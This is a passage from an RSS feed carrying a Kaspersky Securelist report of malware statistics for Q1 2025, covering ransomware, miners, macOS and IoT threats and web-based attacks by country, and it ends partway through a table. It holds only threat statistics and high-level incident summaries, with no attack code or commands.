  1769. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1770. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1771. </item>
  1772. <item>
  1773. <title>IT threat evolution in Q1 2025. Non-mobile statistics</title>
  1774. <link>https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/</link>
  1775. <comments>https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/#respond</comments>
  1777. <dc:creator><![CDATA[AMR]]></dc:creator>
  1778. <pubDate>Thu, 05 Jun 2025 10:00:25 +0000</pubDate>
  1779. <category><![CDATA[Malware reports]]></category>
  1780. <category><![CDATA[Microsoft Windows]]></category>
  1781. <category><![CDATA[Adware]]></category>
  1782. <category><![CDATA[Malware Statistics]]></category>
  1783. <category><![CDATA[Apple MacOS]]></category>
  1784. <category><![CDATA[Ransomware]]></category>
  1785. <category><![CDATA[Malware Descriptions]]></category>
  1786. <category><![CDATA[Malware]]></category>
  1787. <category><![CDATA[Trojan]]></category>
  1788. <category><![CDATA[Internet of Things]]></category>
  1789. <category><![CDATA[Honeypot]]></category>
  1790. <category><![CDATA[Miner]]></category>
  1791. <category><![CDATA[Trojan-stealer]]></category>
  1792. <category><![CDATA[Trojan-Spy]]></category>
  1793. <category><![CDATA[SSH]]></category>
  1794. <category><![CDATA[Windows malware]]></category>
  1795. <category><![CDATA[Unix and macOS malware]]></category>
  1796. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116686</guid>
  1797.  
  1798. <description><![CDATA[The report presents statistics for Windows, macOS, IoT, and other threats, including ransomware, miners, local and web-based threats, for Q1 2025.]]></description>
  1799. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><strong>IT threat evolution in Q1 2025. Non-mobile statistics</strong><br />
  1800. <a href="https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/" target="_blank">IT threat evolution in Q1 2025. Mobile statistics</a></p>
  1801. <p><em>The statistics in this report are based on detection verdicts returned by Kaspersky products unless otherwise stated. The information was provided by Kaspersky users who consented to sharing statistical data.</em></p>
  1802. <h2 id="the-quarter-in-numbers">The quarter in numbers</h2>
  1803. <p>In Q1 2025:</p>
  1804. <ul>
  1805. <li>Kaspersky products blocked more than 629 million attacks that originated with various online resources.</li>
  1806. <li>Web Anti-Virus detected 88 million unique links.</li>
  1807. <li>File Anti-Virus blocked more than 21 million malicious and potentially unwanted objects.</li>
  1808. <li>Nearly 12,000 new ransomware variants were detected.</li>
  1809. <li>More than 85,000 users experienced ransomware attacks.</li>
  1810. <li>RansomHub was involved in attacks on 11% of all ransomware victims whose data was published on data leak sites (DLSs). Slightly under 11% encountered the Akira and Clop ransomware.</li>
  1811. <li>Almost 315,000 users faced miners.</li>
  1812. </ul>
  1813. <h2 id="ransomware">Ransomware</h2>
  1814. <h3 id="the-quarters-trends-and-highlights">The quarter&#8217;s trends and highlights</h3>
  1815. <h4 id="law-enforcement-success">Law enforcement success</h4>
  1816. <p>Phobos Aetor, a joint international effort by law enforcement agencies from the United States, Great Britain, Germany, France and several other countries, resulted in the <a href="https://www.europol.europa.eu/media-press/newsroom/news/key-figures-behind-phobos-and-8base-ransomware-arrested-in-international-cybercrime-crackdown" target="_blank" rel="noopener">arrest of four suspected members</a> of 8Base. They are accused of carrying out more than 1000 cyberattacks around the world with the help of the <a href="https://securelist.com/cis-ransomware/104452/#phobos-eking" target="_blank" rel="noopener">Phobos ransomware</a>. The suspects were arrested in Thailand and charged with extorting more than $16 million dollars in Bitcoin. According to law enforcement officials, the multinational operation resulted in the seizure of more than 40 assets, including computers, phones, and cryptocurrency wallets. Additionally, law enforcement took down 27 servers linked to the cybercrime gang.</p>
  1817. <p>An ongoing effort to combat <a href="https://securelist.com/tag/lockbit/" target="_blank" rel="noopener">LockBit</a> led to the <a href="https://www.justice.gov/usao-nj/pr/dual-russian-and-israeli-national-extradited-united-states-his-role-lockbit-ransomware" target="_blank" rel="noopener">extradition</a> of a suspected ransomware developer to the United States. Arrested in Israel last August, the suspect is accused of receiving more than $230,000 in cryptocurrency for his work with the group between June 2022 and February 2024.</p>
  1818. <h4 id="vulnerabilities-and-attacks-byovd-and-edr-bypassing">Vulnerabilities and attacks, BYOVD, and EDR bypassing</h4>
  1819. <p>The first quarter saw a series of vulnerabilities <a href="https://kb.cert.org/vuls/id/726882" target="_blank" rel="noopener">detected</a> in Paragon Partition Manager. They were assigned the identifiers CVE-2025-0288, CVE-2025-0287, CVE-2025-0286, CVE-2025-0285, and CVE-2025-0289. According to researchers, ransomware gangs had been exploiting the vulnerabilities to gain Windows SYSTEM privileges during BYOVD (bring your own vulnerable driver) attacks.</p>
  1820. <p>Akira <a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-encrypted-network-from-a-webcam-to-bypass-edr/" target="_blank" rel="noopener">exploited</a> a vulnerability in a webcam to try and bypass endpoint detection and response (EDR) and encrypt files on the organization&#8217;s network over the SMB protocol. The attackers found that their Windows ransomware was being detected and blocked by the security solution. To bypass it, they found a vulnerable network webcam in the targeted organization that was running a Linux-based operating system and was not protected by EDR. The attackers were able to evade detection by compromising the webcam, mounting network drives of other machines, and running the Linux version of their ransomware on the camera.</p>
  1821. <p>HellCat leveraged compromised Jira credentials to <a href="https://www.bleepingcomputer.com/news/security/hellcat-hackers-go-on-a-worldwide-jira-hacking-spree/" target="_blank" rel="noopener">attack</a> a series of companies, including Ascom, Jaguar Land Rover, and Affinitiv. According to <a href="https://www.infostealers.com/article/jaguar-land-rover-breached-by-hellcat-ransomware-using-its-infostealer-playbook-then-a-second-hacker-strikes/" target="_blank" rel="noopener">researchers</a>, the threat actors obtain credentials by infecting employees&#8217; computers with Trojan stealers like <a href="https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/" target="_blank" rel="noopener">Lumma</a>.</p>
  1822. <h4 id="other-developments">Other developments</h4>
  1823. <p>An unidentified source <a href="https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-s-internal-chat-logs-leak-online/" target="_blank" rel="noopener">posted</a> Matrix chat logs belonging to the Black Basta gang. The logs feature information about the gang&#8217;s attack techniques and vulnerabilities that it exploited. In addition, the logs contain details about the group&#8217;s internal structure and its members, as well as more than 367 unique ZoomInfo links that the attackers used to gather data on potential victims.</p>
  1824. <p>BlackLock was compromised due to a vulnerability in the threat actor&#8217;s data leak site (DLS). Researchers who <a href="https://www.resecurity.com/blog/article/blacklock-ransomware-a-late-holiday-gift-with-intrusion-into-the-threat-actors-infrastructure" target="_blank" rel="noopener">discovered</a> the vulnerability gained access to confidential information about the group and its activities, including configuration files, login credentials, and the history of commands run on the server. DragonForce, a rival ransomware outfit, exploited the same security flaw to deface the DLS. They changed the site&#8217;s appearance, and made BlackLock&#8217;s internal chat logs and certain configuration files publicly available.</p>
  1825. <h4 id="the-most-prolific-groups">The most prolific groups</h4>
  1826. <p>This section highlights the most prolific ransomware groups by number of victims that each added to their DLS during the reporting period. RansomHub, which stood out in 2024, remained the leader by number of new victims with 11.03%. Akira (10.89%) and Clop (10.69%) followed close behind.</p>
  1827. <div class="js-infogram-embed" data-id="_/TtLYZQF0PuYYU2z1akdJ" data-type="interactive" data-title="01-EN-Malware report PC graphs" style="min-height:;"></div>
  1828. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of the group&#8217;s victims according to its DLS as a percentage of all groups&#8217; victims published on all the DLSs reviewed during the reporting period (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03223543/malware-report-q1-2025-pcEN1.png" target="_blank" rel="noopener">download</a>)</em></p>
  1829. <h3 id="number-of-new-modifications">Number of new modifications</h3>
  1830. <p>In the first quarter, Kaspersky solutions detected three new ransomware families and 11,733 new variants – almost four times more than in the fourth quarter of 2024. This is due to the large number of samples that our solutions categorized as belonging to the Trojan-Ransom.Win32.Gen family.</p>
  1831. <div class="js-infogram-embed" data-id="_/n6PamiPNmo56H13c1A7N" data-type="interactive" data-title="02 EN-RU-ES-Malware report PC graphs" style="min-height:;"></div>
  1832. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>New ransomware variants, Q1 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05083923/malware-report-q1-2025-pc2.png" target="_blank" rel="noopener">download</a>)</em></p>
  1833. <h3 id="number-of-users-attacked-by-ransomware-trojans">Number of users attacked by ransomware Trojans</h3>
  1834. <p>The number of unique KSN users protected is 85,474.</p>
  1835. <div class="js-infogram-embed" data-id="_/LfyR0oMuDb1LD4Id0hFJ" data-type="interactive" data-title="03-EN-Malware report PC graphs" style="min-height:;"></div>
  1836. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by ransomware Trojans, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03223900/malware-report-q1-2025-pcEN3.png" target="_blank" rel="noopener">download</a>)</em></p>
  1837. <h3 id="attack-geography">Attack geography</h3>
  1838. <h4 id="top-10-countries-and-territories-attacked-by-ransomware-trojans">Top 10 countries and territories attacked by ransomware Trojans</h4>
  1839. <table>
  1840. <tbody>
  1841. <tr>
  1842. <td></td>
  1843. <td><strong>Country/territory*</strong></td>
  1844. <td><strong>%**</strong></td>
  1845. </tr>
  1846. <tr>
  1847. <td>1</td>
  1848. <td>Oman</td>
  1849. <td>0.661</td>
  1850. </tr>
  1851. <tr>
  1852. <td>2</td>
  1853. <td>Libya</td>
  1854. <td>0.643</td>
  1855. </tr>
  1856. <tr>
  1857. <td>3</td>
  1858. <td>South Korea</td>
  1859. <td>0.631</td>
  1860. </tr>
  1861. <tr>
  1862. <td>4</td>
  1863. <td>China</td>
  1864. <td>0.626</td>
  1865. </tr>
  1866. <tr>
  1867. <td>5</td>
  1868. <td>Bangladesh</td>
  1869. <td>0.472</td>
  1870. </tr>
  1871. <tr>
  1872. <td>6</td>
  1873. <td>Iraq</td>
  1874. <td>0.452</td>
  1875. </tr>
  1876. <tr>
  1877. <td>7</td>
  1878. <td>Rwanda</td>
  1879. <td>0.443</td>
  1880. </tr>
  1881. <tr>
  1882. <td>8</td>
  1883. <td>Pakistan</td>
  1884. <td>0.441</td>
  1885. </tr>
  1886. <tr>
  1887. <td>9</td>
  1888. <td>Tajikistan</td>
  1889. <td>0.439</td>
  1890. </tr>
  1891. <tr>
  1892. <td>10</td>
  1893. <td>Sri Lanka</td>
  1894. <td>0.419</td>
  1895. </tr>
  1896. </tbody>
  1897. </table>
  1898. <p><em>* Excluded are countries and territories with relatively few (under 50,000) Kaspersky product users.</em><br />
  1899. <em>** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique Kaspersky product users in the country/territory</em></p>
  1900. <h4 id="top-10-most-common-ransomware-trojan-families">TOP 10 most common ransomware Trojan families</h4>
  1901. <table>
  1902. <tbody>
  1903. <tr>
  1904. <td></td>
  1905. <td><strong>Name</strong></td>
  1906. <td><strong>Verdict*</strong></td>
  1907. <td><strong>%**</strong></td>
  1908. <td></td>
  1909. </tr>
  1910. <tr>
  1911. <td>1</td>
  1912. <td>(generic verdict)</td>
  1913. <td>Trojan-Ransom.Win32.Gen</td>
  1914. <td>25.10</td>
  1915. </tr>
  1916. <tr>
  1917. <td>2</td>
  1918. <td>WannaCry</td>
  1919. <td>Trojan-Ransom.Win32.Wanna</td>
  1920. <td>8.19</td>
  1921. </tr>
  1922. <tr>
  1923. <td>3</td>
  1924. <td>(generic verdict)</td>
  1925. <td>Trojan-Ransom.Win32.Encoder</td>
  1926. <td>6.70</td>
  1927. </tr>
  1928. <tr>
  1929. <td>4</td>
  1930. <td>(generic verdict)</td>
  1931. <td>Trojan-Ransom.Win32.Crypren</td>
  1932. <td>6.65</td>
  1933. </tr>
  1934. <tr>
  1935. <td>5</td>
  1936. <td>(generic verdict)</td>
  1937. <td>Trojan-Ransom.Win32.Agent</td>
  1938. <td>3.95</td>
  1939. </tr>
  1940. <tr>
  1941. <td>6</td>
  1942. <td>Cryakl/CryLock</td>
  1943. <td>Trojan-Ransom.Win32.Cryakl</td>
  1944. <td>3.16</td>
  1945. </tr>
  1946. <tr>
  1947. <td>7</td>
  1948. <td>LockBit</td>
  1949. <td>Trojan-Ransom.Win32.Lockbit</td>
  1950. <td>3.15</td>
  1951. </tr>
  1952. <tr>
  1953. <td>8</td>
  1954. <td>(generic verdict)</td>
  1955. <td>Trojan-Ransom.Win32.Phny</td>
  1956. <td>2.90</td>
  1957. </tr>
  1958. <tr>
  1959. <td>9</td>
  1960. <td>PolyRansom/VirLock</td>
  1961. <td>Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom</td>
  1962. <td>2.73</td>
  1963. </tr>
  1964. <tr>
  1965. <td>10</td>
  1966. <td>(generic verdict)</td>
  1967. <td>Trojan-Ransom.Win32.Crypmod</td>
  1968. <td>2.66</td>
  1969. </tr>
  1970. </tbody>
  1971. </table>
  1972. <p><em>* Unique Kaspersky product users attacked by the specific ransomware Trojan family as a percentage of all unique users attacked by this type of threat.</em></p>
  1973. <h2 id="miners">Miners</h2>
  1974. <h3 id="number-of-new-modifications">Number of new modifications</h3>
  1975. <p>In the first quarter of 2025, Kaspersky solutions detected <strong>5,467</strong> new miner variants.</p>
  1976. <div class="js-infogram-embed" data-id="_/qfmv3gRYOS6VGlloi0d8" data-type="interactive" data-title="04-EN-Malware report PC graphs" style="min-height:;"></div>
  1977. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>New miner variants, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03224711/malware-report-q1-2025-pcEN4.png" target="_blank" rel="noopener">download</a>)</em></p>
  1978. <h3 id="number-of-users-attacked-by-miners">Number of users attacked by miners</h3>
  1979. <p>Miners were fairly active in the first quarter. During the reporting period, we detected miner attacks on the computers of <strong>315,701</strong> unique Kaspersky product users worldwide.</p>
  1980. <div class="js-infogram-embed" data-id="_/cWKfuf8GbwWtN4GHoTcq" data-type="interactive" data-title="05-EN-Malware report PC graphs" style="min-height:;"></div>
  1981. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by miners, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03224953/malware-report-q1-2025-pcEN5.png" target="_blank" rel="noopener">download</a>)</em></p>
  1982. <h3 id="attack-geography">Attack geography</h3>
  1983. <h4 id="top-10-countries-and-territories-attacked-by-miners">Top 10 countries and territories attacked by miners</h4>
  1984. <table>
  1985. <tbody>
  1986. <tr>
  1987. <td></td>
  1988. <td><strong>Country/territory*</strong></td>
  1989. <td><strong>%**</strong></td>
  1990. <td></td>
  1991. </tr>
  1992. <tr>
  1993. <td>1</td>
  1994. <td>Senegal</td>
  1995. <td>2.59</td>
  1996. </tr>
  1997. <tr>
  1998. <td>2</td>
  1999. <td>Kazakhstan</td>
  2000. <td>1.36</td>
  2001. </tr>
  2002. <tr>
  2003. <td>3</td>
  2004. <td>Panama</td>
  2005. <td>1.28</td>
  2006. </tr>
  2007. <tr>
  2008. <td>4</td>
  2009. <td>Belarus</td>
  2010. <td>1.22</td>
  2011. </tr>
  2012. <tr>
  2013. <td>5</td>
  2014. <td>Ethiopia</td>
  2015. <td>1.09</td>
  2016. </tr>
  2017. <tr>
  2018. <td>6</td>
  2019. <td>Tajikistan</td>
  2020. <td>1.07</td>
  2021. </tr>
  2022. <tr>
  2023. <td>7</td>
  2024. <td>Moldova</td>
  2025. <td>0.90</td>
  2026. </tr>
  2027. <tr>
  2028. <td>8</td>
  2029. <td>Dominican Republic</td>
  2030. <td>0.86</td>
  2031. </tr>
  2032. <tr>
  2033. <td>9</td>
  2034. <td>Kyrgyzstan</td>
  2035. <td>0.84</td>
  2036. </tr>
  2037. <tr>
  2038. <td>10</td>
  2039. <td>Tanzania</td>
  2040. <td>0.82</td>
  2041. </tr>
  2042. </tbody>
  2043. </table>
  2044. <p><em>* Excluded are countries and territories with relatively few (under 50,000) Kaspersky product users.</em><br />
  2045. <em>** Unique users whose computers were attacked by miners as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
  2046. <h2 id="attacks-on-macos">Attacks on macOS</h2>
  2047. <p>The first quarter saw the <a href="https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/" target="_blank" rel="noopener">discovery</a> of a new Trojan loader for macOS. This is a Go-based variant of ReaderUpdate, which has previously appeared in Python, Crystal, Rust, and Nim versions. These loaders are typically used to download intrusive adware, but there is nothing stopping them from delivering any kind of Trojan.</p>
  2048. <p>During the reporting period <a href="https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/" target="_blank" rel="noopener">researchers identified</a> new loaders from the Ferret malware family which were being distributed by attackers through fake online job interview invitations. These Trojans are believed to be part of an ongoing campaign that began in December 2022. The original members of the Ferret family date back to late 2024. Past versions of the loader delivered both a backdoor and a crypto stealer.</p>
  2049. <p>Throughout the first quarter, various modifications of the <a href="https://securelist.com/crimeware-report-fakesg-akira-amos/111483/#amos" target="_blank" rel="noopener">Amos stealer</a> were the most aggressively distributed Trojans. Amos is designed to steal user passwords, cryptocurrency wallet data, browser cookies, and documents. In this campaign, threat actors frequently modify their Trojan obfuscation techniques to evade detection, generating thousands of obfuscated files to overwhelm security solutions.</p>
  2050. <h4 id="top-20-threats-to-macos">TOP 20 threats to macOS</h4>
  2051. <div class="js-infogram-embed" data-id="_/SAQOyIOEu62NVVMnZAX6" data-type="interactive" data-title="06-ES-EN-Malware report PC graphs" style="min-height:;"></div>
  2052. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em> (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05084335/malware-report-q1-2025-pc6-scaled-1-scaled.png" target="_blank" rel="noopener">download</a>)</em></p>
  2053. <p><em>* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky security solutions for macOS.</em><br />
  2054. <em>* Data for the previous quarter may differ slightly from previously published data due to certain verdicts being retrospectively revised.</em></p>
  2055. <p>As usual, a significant share of the most common threats to macOS consists of potentially unwanted applications: adware, spyware tracking user activity, fake cleaners, and reverse proxies like NetTool. Amos Trojans, which we mentioned earlier, also gained popularity in the first quarter. Trojan.OSX.Agent.gen, which holds the third spot in the rankings, is a generic verdict that detects a wide variety of malware.</p>
  2056. <h3 id="geography-of-threats-to-macos">Geography of threats to macOS</h3>
  2057. <h4 id="top-10-countries-and-territories-by-share-of-attacked-users">TOP 10 countries and territories by share of attacked users</h4>
  2058. <table>
  2059. <tbody>
  2060. <tr>
  2061. <td><strong>Country/territory</strong></td>
  2062. <td><strong>Q4 2024*</strong></td>
  2063. <td><strong>Q1 2025*</strong></td>
  2064. </tr>
  2065. <tr>
  2066. <td>Spain</td>
  2067. <td>1.16%</td>
  2068. <td>1.02%</td>
  2069. </tr>
  2070. <tr>
  2071. <td>France</td>
  2072. <td>1.52%</td>
  2073. <td>0.96%</td>
  2074. </tr>
  2075. <tr>
  2076. <td>Hong Kong</td>
  2077. <td>1.21%</td>
  2078. <td>0.83%</td>
  2079. </tr>
  2080. <tr>
  2081. <td>Singapore</td>
  2082. <td>0.32%</td>
  2083. <td>0.75%</td>
  2084. </tr>
  2085. <tr>
  2086. <td>Mexico</td>
  2087. <td>0.85%</td>
  2088. <td>0.74%</td>
  2089. </tr>
  2090. <tr>
  2091. <td>Germany</td>
  2092. <td>0.96%</td>
  2093. <td>0.74%</td>
  2094. </tr>
  2095. <tr>
  2096. <td>Mainland China</td>
  2097. <td>0.73%</td>
  2098. <td>0.68%</td>
  2099. </tr>
  2100. <tr>
  2101. <td>Brazil</td>
  2102. <td>0.66%</td>
  2103. <td>0.61%</td>
  2104. </tr>
  2105. <tr>
  2106. <td>Russian Federation</td>
  2107. <td>0.50%</td>
  2108. <td>0.53%</td>
  2109. </tr>
  2110. <tr>
  2111. <td>India</td>
  2112. <td>0.84%</td>
  2113. <td>0.51%</td>
  2114. </tr>
  2115. </tbody>
  2116. </table>
  2117. <p><em>* Unique users who encountered threats to macOS as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
  2118. <h2 id="iot-threat-statistics">IoT threat statistics</h2>
  2119. <p><em>This section presents statistics on attacks targeting Kaspersky IoT honeypots. The geographic data on attack sources is based on the IP addresses of attacking devices.</em></p>
  2120. <p>In the first quarter of 2025, the share of devices that attacked Kaspersky honeypots via the Telnet protocol increased again, following a decline at the end of 2024.</p>
  2121. <div class="js-infogram-embed" data-id="_/VC8mYjhxGiEx8SyBciGb" data-type="interactive" data-title="07-EN-ES-Malware report PC graphs" style="min-height:;"></div>
  2122. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of attacked services by number of unique IP addresses of attacking devices (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05085117/malware-report-q1-2025-pc7.png" target="_blank" rel="noopener">download</a>)</em></p>
  2123. <p>The distribution of attacks across Telnet and SSH remained virtually unchanged compared to the fourth quarter of 2024.</p>
  2124. <div class="js-infogram-embed" data-id="_/hidtuVe32dVjJRwW3Zwr" data-type="interactive" data-title="08-EN-ES-Malware report PC graphs" style="min-height:;"></div>
  2125. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of attackers&#8217; sessions in Kaspersky honeypots (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05085229/malware-report-q1-2025-pc8.png" target="_blank" rel="noopener">download</a>)</em></p>
  2126. <h3 id="top-10-threats-delivered-to-iot-devices">TOP 10 threats delivered to IoT devices:</h3>
  2127. <div class="js-infogram-embed" data-id="_/LBg19h9hPlaPnfxw2msy" data-type="interactive" data-title="09-ES-EN-Malware report PC graphs" style="min-height:;"></div>
  2128. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share of each threat uploaded to an infected device as a result of a successful attack in the total number of uploaded threats (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05084049/malware-report-q1-2025-pc9.png" target="_blank" rel="noopener">download</a>)</em></p>
  2129. <p>A significant portion of the most widespread IoT threats continues to be made up of various Mirai DDoS botnet variants. BitCoinMiner also saw active distribution in the first quarter, accounting for 7.32% of detections. The number of attacks by the NyaDrop botnet (19.31%) decreased compared to the fourth quarter of 2024.</p>
  2130. <h3 id="geography-of-attacks-on-iot-honeypots">Geography of attacks on IoT honeypots</h3>
  2131. <p>When looking at SSH attacks by country/territory, mainland China&#8217;s share has declined, while attacks coming from Brazil have seen a noticeable increase. There was also a slight uptick in attacks coming from the United States, Indonesia, Australia, and Vietnam.</p>
  2132. <table>
  2133. <tbody>
  2134. <tr>
  2135. <td><strong>Country/territory</strong></td>
  2136. <td><strong>Q4 2024</strong></td>
  2137. <td><strong>Q1 2025</strong></td>
  2138. </tr>
  2139. <tr>
  2140. <td>Mainland China</td>
  2141. <td>32.99%</td>
  2142. <td>20.52%</td>
  2143. </tr>
  2144. <tr>
  2145. <td>India</td>
  2146. <td>19.13%</td>
  2147. <td>19.16%</td>
  2148. </tr>
  2149. <tr>
  2150. <td>Russian Federation</td>
  2151. <td>9.46%</td>
  2152. <td>9.16%</td>
  2153. </tr>
  2154. <tr>
  2155. <td>Brazil</td>
  2156. <td>2.18%</td>
  2157. <td>8.48%</td>
  2158. </tr>
  2159. <tr>
  2160. <td>United States</td>
  2161. <td>4.90%</td>
  2162. <td>5.52%</td>
  2163. </tr>
  2164. <tr>
  2165. <td>Indonesia</td>
  2166. <td>1.37%</td>
  2167. <td>3.99%</td>
  2168. </tr>
  2169. <tr>
  2170. <td>Hong Kong</td>
  2171. <td>2.81%</td>
  2172. <td>3.46%</td>
  2173. </tr>
  2174. <tr>
  2175. <td>Australia</td>
  2176. <td>1.31%</td>
  2177. <td>2.75%</td>
  2178. </tr>
  2179. <tr>
  2180. <td>France</td>
  2181. <td>3.53%</td>
  2182. <td>2.54%</td>
  2183. </tr>
  2184. <tr>
  2185. <td>Vietnam</td>
  2186. <td>1.41%</td>
  2187. <td>2.27%</td>
  2188. </tr>
  2189. </tbody>
  2190. </table>
  2191. <p>The share of Telnet attacks originating from China and India dropped, while Brazil, Nigeria, and Indonesia took a noticeably larger share.</p>
  2192. <table>
  2193. <tbody>
  2194. <tr>
  2195. <td><strong>Country/territory</strong></td>
  2196. <td><strong>Q4 2024</strong></td>
  2197. <td><strong>Q1 2025</strong></td>
  2198. </tr>
  2199. <tr>
  2200. <td>China</td>
  2201. <td>44.67%</td>
  2202. <td>39.82%</td>
  2203. </tr>
  2204. <tr>
  2205. <td>India</td>
  2206. <td>33.79%</td>
  2207. <td>30.07%</td>
  2208. </tr>
  2209. <tr>
  2210. <td>Brazil</td>
  2211. <td>2.62%</td>
  2212. <td>12.03%</td>
  2213. </tr>
  2214. <tr>
  2215. <td>Russian Federation</td>
  2216. <td>6.52%</td>
  2217. <td>5.14%</td>
  2218. </tr>
  2219. <tr>
  2220. <td>Pakistan</td>
  2221. <td>5.77%</td>
  2222. <td>3.99%</td>
  2223. </tr>
  2224. <tr>
  2225. <td>Nigeria</td>
  2226. <td>0.50%</td>
  2227. <td>3.01%</td>
  2228. </tr>
  2229. <tr>
  2230. <td>Indonesia</td>
  2231. <td>0.58%</td>
  2232. <td>2.25%</td>
  2233. </tr>
  2234. <tr>
  2235. <td>United States</td>
  2236. <td>0.42%</td>
  2237. <td>0.68%</td>
  2238. </tr>
  2239. <tr>
  2240. <td>Ukraine</td>
  2241. <td>0.79%</td>
  2242. <td>0.67%</td>
  2243. </tr>
  2244. <tr>
  2245. <td>Sweden</td>
  2246. <td>0.42%</td>
  2247. <td>0.33%</td>
  2248. </tr>
  2249. </tbody>
  2250. </table>
  2251. <h2 id="attacks-via-web-resources">Attacks via web resources</h2>
  2252. <p><em>The statistics in this section are based on detection verdicts by Web Anti-Virus, which protects users when suspicious objects are downloaded from malicious or infected web pages. Cybercriminals create malicious pages on purpose. Websites that host user-created content, such as forums, as well as compromised legitimate sites, can become infected.</em></p>
  2253. <h3 id="countries-and-territories-that-serve-as-sources-of-web-based-attacks-the-top-10">Countries and territories that serve as sources of web-based attacks: the TOP 10</h3>
  2254. <p>This section contains a geographical distribution of sources of online attacks blocked by Kaspersky products: web pages that redirect to exploits, sites that host exploits and other malware, botnet C&amp;C centers, and so on. Any unique host could be the source of one or more web-based attacks.<br />
  2255. To determine the geographical source of web-based attacks, domain names were matched against their actual IP addresses, and then the geographical location of a specific IP address (GeoIP) was established.</p>
  2256. <p>In the first quarter of 2025, Kaspersky solutions blocked <strong>629,211,451 </strong>attacks launched from online resources across the globe. Web Anti-Virus detected <strong>88,389,361</strong> unique URLs.</p>
  2257. <div class="js-infogram-embed" data-id="_/rMhwfbqmTtIocmXyWCIY" data-type="interactive" data-title="10-EN-Malware report PC graphs" style="min-height:;"></div>
  2258. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Geographical distribution of sources of web-based attacks by country/territory, Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03230309/malware-report-q1-2025-pcEN10.png" target="_blank" rel="noopener">download</a>)</em></p>
  2259. <h3 id="countries-and-territories-where-users-faced-the-greatest-risk-of-online-infection">Countries and territories where users faced the greatest risk of online infection</h3>
  2260. <p>To assess the risk of online infection faced by PC users in various countries and territories, for each country or territory, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data reflects the aggressiveness of the environment in which computers operate in different countries and territories.</p>
  2261. <p>These rankings only include attacks by malicious objects that belong in the <strong>Malware</strong> category. Our calculations do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware<em>.</em></p>
  2262. <table>
  2263. <tbody>
  2264. <tr>
  2265. <td></td>
  2266. <td><strong>Country/territory*</strong></td>
  2267. <td><strong>%**</strong></td>
  2268. <td></td>
  2269. </tr>
  2270. <tr>
  2271. <td>1</td>
  2272. <td>North Macedonia</td>
  2273. <td>10.17</td>
  2274. </tr>
  2275. <tr>
  2276. <td>2</td>
  2277. <td>Albania</td>
  2278. <td>9.96</td>
  2279. </tr>
  2280. <tr>
  2281. <td>3</td>
  2282. <td>Algeria</td>
  2283. <td>9.92</td>
  2284. </tr>
  2285. <tr>
  2286. <td>4</td>
  2287. <td>Bangladesh</td>
  2288. <td>9.92</td>
  2289. </tr>
  2290. <tr>
  2291. <td>5</td>
  2292. <td>Tunisia</td>
  2293. <td>9.80</td>
  2294. </tr>
  2295. <tr>
  2296. <td>6</td>
  2297. <td>Slovakia</td>
  2298. <td>9.77</td>
  2299. </tr>
  2300. <tr>
  2301. <td>7</td>
  2302. <td>Greece</td>
  2303. <td>9.66</td>
  2304. </tr>
  2305. <tr>
  2306. <td>8</td>
  2307. <td>Serbia</td>
  2308. <td>9.44</td>
  2309. </tr>
  2310. <tr>
  2311. <td>9</td>
  2312. <td>Tajikistan</td>
  2313. <td>9.28</td>
  2314. </tr>
  2315. <tr>
  2316. <td>10</td>
  2317. <td>Turkey</td>
